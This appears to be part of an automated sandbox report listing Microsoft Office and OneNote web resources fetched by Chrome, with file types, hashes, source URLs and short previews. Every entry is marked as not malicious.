                                                                                      Preview:.<?xml version="1.0" encoding="UTF-8"?>..<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0" xmlns:ov="http://schemas.microsoft.com/office/taskpaneappversionoverrides" xsi:type="TaskPaneApp">...<Id>90da59be-5361-4260-9218-2262af1dc334</Id>...<Version>1.0.0.0</Version>...<ProviderName>Microsoft Corporation</ProviderName>...<DefaultLocale>en-US</DefaultLocale>...<DisplayName DefaultValue="Add Meeting Details">.... START STRING LOCALIZATION REPLACEMENT (StringID: OfficeAddIns.Meetings.ManifestDisplayName -->......<Override Locale="af-ZA" Value="Voeg vergaderingbesonderhede by" />....<Override Locale="en-US" Value="Add Meeting Details" />....<Override Locale="am-ET" Value="..... ...... ...." />....<Override Locale="ar-SA" Value="..... ...... ........" />....<Override Locale="as-IN" Value="..
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 280 x 60, 8-bit/color RGBA, non-interlaced
                                                                                      Category:downloaded
                                                                                      Size (bytes):3666
                                                                                      Entropy (8bit):7.918283721458629
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:C9F31E87400C46F9F8FB580602328C72
                                                                                      SHA1:4B538CA736FB2A88A89214AD5EB0B2B80640B5AB
                                                                                      SHA-256:DDE1ACEFE23281E3715BDEE565CF1FD7064370D4BB751AB92C4ADD7D42932BBE
                                                                                      SHA-512:A9EC3AFFF1F92BD76371C640C17585F9578CAF202594A7BED0FA3ABFA35A23031CDE7C347445B3FE68890AD0FFE1C8469765185C974E65440A08FA2B10797CA1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=636783560697171089
                                                                                      Preview:.PNG........IHDR.......<............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]...U.>7P..7..B......P.."* F*..I@..,]..I+@@@"K.-..<B..x1...p].Y.A<..W.....0.=...g........{g...}..g......h.1..q..j.....#..{..}.m.QE..Q(.NP..Ks.mn..].q....!...@.P(.Q(..`...B..B.P..P(..(...2..B.....(..`......d|.j..$.A......R..P(.2..t.F...P.&..`.A...:<I..j..8Z...'Sa.......MB..e0....Yl.........c..[..............t7:?...Z.j....t.ItO..(.....ab......"0..,e$1..>.R6.)4.f........!I3.ct.)i...s\..H......WU.....?.P.D.F..Lt8K}uX.V..1...7&.`s.........lj.a}U....j..F..m.g.}.U~.|.......z"..w*.q.s..!z ....z#M..4!..D..c...UU(\......W...]..2...C..TEr..lP+..r......,.d.Q..@'.5U(H...!lq..9...$......l#~.<............o.WT.PG8.3.TEr.AD..(.`...G'.*.D_...T...{..m.r...e)....(..*...l......0..........6.:.....2..$.....y.J.....1...+Q...p_......z...q....thf2;3'.vc.P.{b..w..!.'.GT..|. ..tm...M......m.#......r...LA./......>..oX.m..."b;......w.6.;....@..](.n..*.x.>...cD.......N..hf....;ok..9*.K.....D..2.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):339610
                                                                                      Entropy (8bit):5.461680846673144
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:3309FB05681E22B6802DDA0759839080
                                                                                      SHA1:C2E778DA54300AD0CBAE065147E4E255068CADC5
                                                                                      SHA-256:316FA5C7EA4EDF117C79E2447E95506068FAE35FB15E302D15F3822417C7C321
                                                                                      SHA-512:844FF8216156B1D7319F4F7E87E67565E31DE3D45BEBC8176C81BD98EED7F7ACD9925780AA285C98995674615BE5E6F347F78A9A9E99480BA8C9A64CFE7E3C5F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://wise.public.cdn.office.net/wise/owl/owl.onenote.2cd87d0e897aa8712ec1.js
                                                                                      Preview:var Microsoft;!function(){var e,t,n,i,o={4267:function(e,t,n){var i,o=function(){var e=String.fromCharCode,t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",i={};function o(e,t){if(!i[e]){i[e]={};for(var n=0;n<e.length;n++)i[e][e.charAt(n)]=n}return i[e][t]}var s={compressToBase64:function(e){if(null==e)return"";var n=s.H(e,6,(function(e){return t.charAt(e)}));switch(n.length%4){default:case 0:return n;case 1:return n+"===";case 2:return n+"==";case 3:return n+"="}},decompressFromBase64:function(e){return null==e?"":""==e?null:s.A(e.length,32,(function(n){return o(t,e.charAt(n))}))},compressToUTF16:function(t){return null==t?"":s.H(t,15,(function(t){return e(t+32)}))+" "},decompressFromUTF16:function(e){return null==e?"":""==e?null:s.A(e.length,16384,(function(t){return e.charCodeAt(t)-32}))},compressToUint8Array:function(e){for(var t=s.compress(e),n=new Uint8Array(2*t.length),i=0,o=t.length;i<o;i
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):80074
                                                                                      Entropy (8bit):5.058726158357534
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:7E93C384B574C1D19DF910D525EC3789
                                                                                      SHA1:EDF6EBFAF4A1F29E76B4094BB5B9DFB57388ECA6
                                                                                      SHA-256:16AB414F8B420754EB7D8095EF2E2953C18C442E173B1CBC1603CB0E19F1CC95
                                                                                      SHA-512:A64B7008BFA9F29EB26656137952E6C62DA50A80E071ED743B7A6468A2CF856A78A1F5CBE4A7562B1E130FF296C288744158AEF51BBDC576A87F4A265DDB2816
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Type.registerNamespace("Box4Intl");Box4Intl.Box4Strings=function(){};Box4Intl.Box4Strings.registerClass("Box4Intl.Box4Strings");Box4Intl.Box4Strings.l_OutlineResizeAlt="Resize the Outline";Box4Intl.Box4Strings.l_NavigationPaneContentsLabel="Notebook Contents";Box4Intl.Box4Strings.l_UntitledPageText="Untitled Page";Box4Intl.Box4Strings.l_UntitledSection="Untitled Section";Box4Intl.Box4Strings.l_NotebookPagesSection="General Pages";Box4Intl.Box4Strings.l_ProtoButtonText="New Page";Box4Intl.Box4Strings.l_SectionGroupAltText="Section Group";Box4Intl.Box4Strings.l_SectionGroupArrowAltText="Navigate Up";Box4Intl.Box4Strings.l_DefaultUserName="Unknown User";Box4Intl.Box4Strings.l_UserInitialsDelimeter="; ";Box4Intl.Box4Strings.l_PageLoadingText="Loading...";Box4Intl.Box4Strings.l_OreoSpinnerText="Loading Page...";Box4Intl.Box4Strings.l_ConflictPage="Conflict Page";Box4Intl.Box4Strings.l_PageAccessibilityContext="Page {0}";Box4Intl.Box4Strings.l_PageWithSearchResultsAccessibilityContext="Page
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (41116)
                                                                                      Category:downloaded
                                                                                      Size (bytes):41140
                                                                                      Entropy (8bit):5.513380748841639
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:08FBFF79B5EEC28DDFF4D772223B81A9
                                                                                      SHA1:AAABD7E0B32698E8295139C4868E9AEE5EDBD112
                                                                                      SHA-256:773A678845579E6334F19D4E62F29446E7898BD816359C74574E37884503F909
                                                                                      SHA-512:F94A2C8D756313A616F4E3DBDB9661AF3CC843F74CF066243C649F943E4AEAB696E01E37E33CC57DF16F73504B529702D28C779931ADC2630C6D4FD318FFDDC7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://cdn.onenote.net/officeaddins/161821840453_Scripts/CommonDiagnostics.js
                                                                                      Preview:/*! Version=16.0.0.0 */.if(!window)window=this;var Type=Function;window.Type=Type;Array.$F=function(a,b){a.push(b)};Array.clear=function(a){a.length=0};Array.$1n=function(a,b){return Array.$1L(a,b)>=0};Array.$1L=function(c,e,a){if(c.indexOf)return c.indexOf(e,a);a=a;if(isNaN(a))a=0;var d=c.length;if(isFinite(a))a=a|0;if(a<0)a=Math.max(0,d+a);for(var b=a;b<d;b++)if(c[b]===e)return b;return-1};Array.dequeue=function(a){return a.shift()};Array.enqueue=function(a,b){Array.$F(a,b)};Array.$2O=function(b,c){var a=Array.$1L(b,c);a>=0&&Array.$1y(b,a);return a>=0};Array.$1y=function(a,b){a.splice(b,1)};Array.__typeName="Array";Array.$1c=true;Boolean.__typeName="Boolean";Boolean.$1c=true;Date.$26=function(f,c){for(var d=0,a=false,b=0,g=f.length;b<g;b++){var e=f.charAt(b);switch(e){case"'":if(a)c.$0("'");else d++;a=false;break;case"\\":a&&c.$0("\\");a=!a;break;default:c.$0(e.toString());a=false}}return d};Date.$2E=function(a,b){if(!b)b="F";if(b.length===1)switch(b){case"d":return a.ShortDatePatter
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (30497), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):30497
                                                                                      Entropy (8bit):5.0064253326064065
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:E55F3C2F2F2F2A339E4B0A08030E9803
                                                                                      SHA1:729D608C534829E07F5DCDBBD75BBC031A9E9D9A
                                                                                      SHA-256:40CBE329851D4261E0E4A3B3665FD1025747AAC3CBFD87689CF3F2689CACF4E9
                                                                                      SHA-512:CB67A880ECAA6F59844F6604BB98A7E27AB64F639AC79BA683C164A2A809BFAF1D3B224CC50138846B8646EF05409820AEE490BA83D637145E16A78E67CF4847
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/h40CBE329851D4261_App_Scripts/1033/WoncaIntl.js
                                                                                      Preview:Type.registerNamespace("WoncaIntl");WoncaIntl.WoncaStrings=function(){};WoncaIntl.WoncaStrings.registerClass("WoncaIntl.WoncaStrings");WoncaIntl.WoncaStrings.L_RibbonLabel="Ribbon";WoncaIntl.WoncaStrings.L_TabHome="Home";WoncaIntl.WoncaStrings.L_TabInsert="Insert";WoncaIntl.WoncaStrings.L_TabWordDesign="Design";WoncaIntl.WoncaStrings.L_TabReferences="References";WoncaIntl.WoncaStrings.L_TabMailings="Mailings";WoncaIntl.WoncaStrings.L_TabReview="Review";WoncaIntl.WoncaStrings.L_TabView="View";WoncaIntl.WoncaStrings.L_TabDeveloper="Developer";WoncaIntl.WoncaStrings.L_TabAddIns="Add-ins";WoncaIntl.WoncaStrings.L_TabTableTools="Table Tools";WoncaIntl.WoncaStrings.L_TabLayout="Layout";WoncaIntl.WoncaStrings.L_TabPictureTools="Picture Tools";WoncaIntl.WoncaStrings.L_TabFormatPicture="Format";WoncaIntl.WoncaStrings.L_TabDesign="Design";WoncaIntl.WoncaStrings.L_TabHelp="Help";WoncaIntl.WoncaStrings.L_GroupUndoRedo="Undo";WoncaIntl.WoncaStrings.L_GroupClipboard="Clipboard";WoncaIntl.WoncaString
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows cursor resource - 1 icon, 32x32, hotspot @16x16
                                                                                      Category:downloaded
                                                                                      Size (bytes):4286
                                                                                      Entropy (8bit):0.3626382302432769
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:04D59A1FFDA7020CBDA1BB9FCBF0BCA0
                                                                                      SHA1:E0CACE5751F02AF9E12B3C066FFD542F3D12A279
                                                                                      SHA-256:EDC250E23E06AE7D15C1C19FDF9C6759129796B0A2F76DC82DF665C823C7B495
                                                                                      SHA-512:A997D4384DA8D401321C497F49F73F0C79C1815DFD8B679458385D4E4A8ED2F645DDCF940A9347EA35F2D7AD3EE710F06784E8E1B1461AB7E8633BFF0FE0A691
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_resources/1033/pen_32x32.cur
                                                                                      Preview:...... ..............(... ...@..... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (4207), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4212
                                                                                      Entropy (8bit):5.732834657954366
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:5780200B7FE28C3F2C46864A012246E5
                                                                                      SHA1:03A13FDC8A8CC7DBECE15E23105EA6E870105133
                                                                                      SHA-256:0EF96689F29280B58D5024539DFE352EC9DD520CA1EDA5E24F0AEBD31DE0A560
                                                                                      SHA-512:4FCC868D4E3401728FE4AEBB2AF8D2DB937309EA98EB916E02CF85E61504170C5B7B62C3169D4BE130363552063B1232575CDD9863026CAB2816DA96BD03AD26
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title></title><script type="text/javascript"> var l_ErrorImageAlt_Text = "The service is unavailable"; var l_ErrorHeader_Text = "Service Unavailable"; var l_ErrorLine1_Text = "We are currently experiencing technical difficulties."; var l_ErrorLine2_Text = "Please try again later."; var l_ErrorHeaderStyle_Text = "font-family: calibri, tahoma, verdana, arial, sans serif; font-size: 18pt; color: #444444; line-height: 150%"; var l_ErrorTextStyle_Text = "font-family: calibri, tahoma, verdana, arial, sans serif; font-size: 10pt; color: #444444"; var language = "en-us"; function writeLocalizedErrorMessage() { getBrowserLanguage(); loadScript(); try{ if(window.parent.g_enableFramePageErrorReporting) { const message = { MessageId: "Wac_AppFailed", SendTim
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (2224), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2224
                                                                                      Entropy (8bit):5.029670917384203
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:96EC242EA2E25558F7EC13FA88D9D793
                                                                                      SHA1:B0BB7F6BD5206CC1FFB572CBD4A6AD2F88D42433
                                                                                      SHA-256:850C54CE960E710757379C19601C65C00CF7D485063115F34AA30AE193CCEA43
                                                                                      SHA-512:8C732012F96C7A9B4434F1BC27262A07080F05FCDF54E64B9CB4F37C20D3D8A85FAC2387C934798056D137B03F918D5CE4847C835CC013EDD4485686993D5F4F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:OfficeBrowserFeedback.setUiStrings({FeedbackSubtitle:"Send Feedback to Microsoft",PrivacyStatement:"Privacy Statement",Form:{CommentPlaceholder:"Please do not include any confidential or personal information in your comment",CategoryPlaceholder:"Select a category (optional)",EmailPlaceholder:"Email (optional)",RatingLabel:"Rating",ScreenshotLabel:"Include screenshot",Submit:"Submit",Cancel:"Cancel",EmailCheckBoxLabel:"You can contact me about this feedback",PrivacyConsent:"IT admins for your organization will be able to view and manage your feedback data.",PrivacyLabel:"By pressing submit, your feedback will be used to improve Microsoft products and services. ",ScreenshotImgAltText:"Screenshot Preview"},SingleForm:{Title:"Please provide feedback"},SmileForm:{Anchor:"I like something",Title:"What did you like?"},FrownForm:{Anchor:"I don't like something",Title:"What did you not like?"},IdeaForm:{Anchor:"I have a suggestion",Title:"What do you suggest?"},BugForm:{Anchor:"File a bug",Titl
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65457)
                                                                                      Category:dropped
                                                                                      Size (bytes):146751
                                                                                      Entropy (8bit):5.3333382997024
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:122C9E4338794A3EE4A5E74D9777BC0F
                                                                                      SHA1:98EF50E42CE81E5A7DB198EB3370252DE9A8BEBC
                                                                                      SHA-256:3BDAE7D8720DA0DCD5883C72A02762CF728F2392BAD92716FCEE190CA5AF2C53
                                                                                      SHA-512:8D7562526CE650813DE4A16E218C94976F7C7AD3590F659502D76E2CBB320AF056A6A82BA0970A947B360FE8A2F12FD8AF037AC4D04B09849E440C9F871AA207
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:/*! For license information please see odsp.1ds.lib-b7da68fc.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.1ds.lib"],{"1ds-lib":function(e,t,n){n.r(t),n.d(t,{_InMemoryPropertyStorage:function(){return Ws},_OneDSLogger:function(){return Ks},_SanitizerIds:function(){return vs},_getDefaultScrubberConfig:function(){return js}});var a={};n.r(a),n.d(a,{optionalDiagnostic:function(){return os},requiredDiagnostic:function(){return rs},requiredService:function(){return ss}});var i=function(e,t){return i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},i(e,t)};function r(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function n(){this.constructor=e}i(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}var o=function(){retu
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):61
                                                                                      Entropy (8bit):3.990210155325004
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):73609
                                                                                      Entropy (8bit):5.5168576069870365
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:641ED2F088E8590E8A1FA338B988EE64
                                                                                      SHA1:84B6C315096AE4CAF1EB06FA25AABA97FA3A19D7
                                                                                      SHA-256:3E5143BA7FDD5C2AAEAE9B33D0B816CE31010263F46B4404F0757E7815904004
                                                                                      SHA-512:9CFB43A421C6EA6E3DC97DB9F71F396815515F3ED35510DC3188DD1B52C1903512CDCA2E96280C5BC99751802E54AF9C9EF972795C28219BA9C709FD321D0C2A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://res-1.cdn.office.net/wise/owl/owl.handlers.7a8d0f78d4fddf13148f.js
                                                                                      Preview:(globalThis.webpackChunkMicrosoft_Office_OWL=globalThis.webpackChunkMicrosoft_Office_OWL||[]).push([[6720],{32210:function(e,n,t){"use strict";t.d(n,{A:function(){return a}});var o=t(79206),r=t.n(o),i=t(87166),s=t.n(i)()(r());s.push([e.id,".lLFji2JIIWB51LkuYBKM{width:75%;height:75%;position:fixed;top:50%;left:50%;transform:translateY(-50%) translateX(-50%);background-color:#fff;box-sizing:border-box;outline:1px solid transparent;z-index:5;box-shadow:0 0 5px 0 rgba(0,0,0,.4);border:none}","",{version:3,sources:["webpack://./../owl-service/lib/filePicker/filePickerStyles.module.scss"],names:[],mappings:"AAAA,sBACE,SAAA,CACA,UAAA,CACA,cAAA,CACA,OAAA,CACA,QAAA,CACA,2CAAA,CACA,qBAAA,CACA,qBAAA,CACA,6BAAA,CACA,SAAA,CACA,mCAAA,CACA,WAAA",sourcesContent:[".file-picker-iframe {\n width: 75%;\n height: 75%;\n position: fixed;\n top: 50%;\n left: 50%;\n transform: translateY(-50%) translateX(-50%);\n background-color: #fff;\n box-sizing: border-box;\n outline: 1px solid transparent;\n z
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (32011), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):53853
                                                                                      Entropy (8bit):5.500009921962495
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:5A8ED3646A340A247CD48F5732BAEA69
                                                                                      SHA1:8A961A2C1461EB5CD8A9009911970824602F8B79
                                                                                      SHA-256:C459EC1608D98A847AB4C83723E1C4B2DC6E58A7006D5566C529A93113C2EE62
                                                                                      SHA-512:5421BC6C0EA27EE75F7B5633AA5757C62EE16C84E94099D301EEA9944131F8A26CE941711ACE5EFB66AD62FBD16460B31403A2B016E8CF72D1F025868CA838D8
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:var clienttelemetry_build;!function(e){e.version="2.9.0"}(clienttelemetry_build||(clienttelemetry_build={}));var Microsoft;!function(e){var t;!function(e){var t;!function(e){e[e.BT_STOP=0]="BT_STOP",e[e.BT_STOP_BASE=1]="BT_STOP_BASE",e[e.BT_BOOL=2]="BT_BOOL",e[e.BT_UINT8=3]="BT_UINT8",e[e.BT_UINT16=4]="BT_UINT16",e[e.BT_UINT32=5]="BT_UINT32",e[e.BT_UINT64=6]="BT_UINT64",e[e.BT_FLOAT=7]="BT_FLOAT",e[e.BT_DOUBLE=8]="BT_DOUBLE",e[e.BT_STRING=9]="BT_STRING",e[e.BT_STRUCT=10]="BT_STRUCT",e[e.BT_LIST=11]="BT_LIST",e[e.BT_SET=12]="BT_SET",e[e.BT_MAP=13]="BT_MAP",e[e.BT_INT8=14]="BT_INT8",e[e.BT_INT16=15]="BT_INT16",e[e.BT_INT32=16]="BT_INT32",e[e.BT_INT64=17]="BT_INT64",e[e.BT_WSTRING=18]="BT_WSTRING",e[e.BT_UNAVAILABLE=127]="BT_UNAVAILABLE"}(t=e.BondDataType||(e.BondDataType={}));var n;!function(e){e[e.MARSHALED_PROTOCOL=0]="MARSHALED_PROTOCOL",e[e.MAFIA_PROTOCOL=17997]="MAFIA_PROTOCOL",e[e.COMPACT_PROTOCOL=16963]="COMPACT_PROTOCOL",e[e.JSON_PROTOCOL=21322]="JSON_PROTOCOL",e[e.PRETTY_JSON_PR
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):72
                                                                                      Entropy (8bit):4.241202481433726
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                      SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                      SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                      SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (7708)
                                                                                      Category:downloaded
                                                                                      Size (bytes):7758
                                                                                      Entropy (8bit):5.292923747247591
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:DDD63B48AF585746957581C2465786B8
                                                                                      SHA1:D57B0B43445D410B476B2FE9EB6C685E297851AE
                                                                                      SHA-256:1F40B9A806FAA70C1C142A9AD7EB4EAA84A3F3A18184ADFF6AEA4B21A2C60A9D
                                                                                      SHA-512:9E20DC9F4B42636A3DC0D0DE01AA46BF5CE909B2DC8A3520C8B5B76D3EB40324D2CF9008B1AFAB3377BADC2826645BA68817CA2B1C228828B7A1C7CE96B68672
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/wp5/appResourceLoader.min.js
                                                                                      Preview:var appResourceLoader;!function(){"use strict";var e,n,t,o,r={61435:function(e,n,t){t.r(n),t.d(n,{init:function(){return c.Ts},loadChunk:function(){return g},loadIntlBootResources:function(){return a}});var o=t(33959);let r,i=!1;function a(e){const n="onenote-ribbon-intl.min.js";return i||(r=(0,o.loadScript)(n,e.scriptBaseUrl.concat(n),void 0,5),i=!0),r}var c=t(81934);const s="appChrome",u="canvasAtMentions",l="loopLoadingManager",d="navigation",f="onenote-navpane-strings",p="onenote-ribbon-intl",h="onenote-whatsnew-strings",m="sharedComments",b="comment-pane-strings",v="hyperlinkFloatie",y={[s]:{dependencies:[p]},[l]:{},[v]:{},[m]:{dependencies:[b]},[u]:{dependencies:[b]},[d]:{dependencies:[f,h]},[p]:{isLocalized:!0},"onenote-ribbon-intl-fluent":{isLocalized:!0},"onenote-ribbon-sprite-lazy":{isLocalized:!0},"onenote-ribbon-sprite-lazy-fluent":{isLocalized:!0},"onenote-ribbon-intl-lazy":{isLocalized:!0},"onenote-ribbon-intl-lazy-fluent":{isLocalized:!0},"onenote-intl-mlr-lazy":{isLocal
                                                                                      No static file info